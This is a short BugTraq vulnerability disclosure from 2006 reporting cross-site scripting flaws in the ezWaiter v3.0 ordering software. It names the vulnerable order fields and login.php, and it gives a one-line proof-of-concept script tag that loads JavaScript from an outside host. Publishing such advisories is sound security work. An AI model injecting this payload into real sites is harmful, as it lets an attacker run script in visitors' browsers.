BugTraq
ezWaiter v3.0 - XSS Jun 30 2006 03:14AM
luny youfucktard com
ezWaiter v3.0

Homepage:

http://www.ezwaiter.com/

Affected files:

Placing an order

login.php

-------------------------------------------

XSS vuln when placing an order:

User input is not sanatized before being generated. For a PoC in the two boxes labeled

"Who is this item for?" and "Special Instructions:"

put:

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

The login form found on login.php can be spoofed to remove the max char limits. It too doesn't sanatize data.

---------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus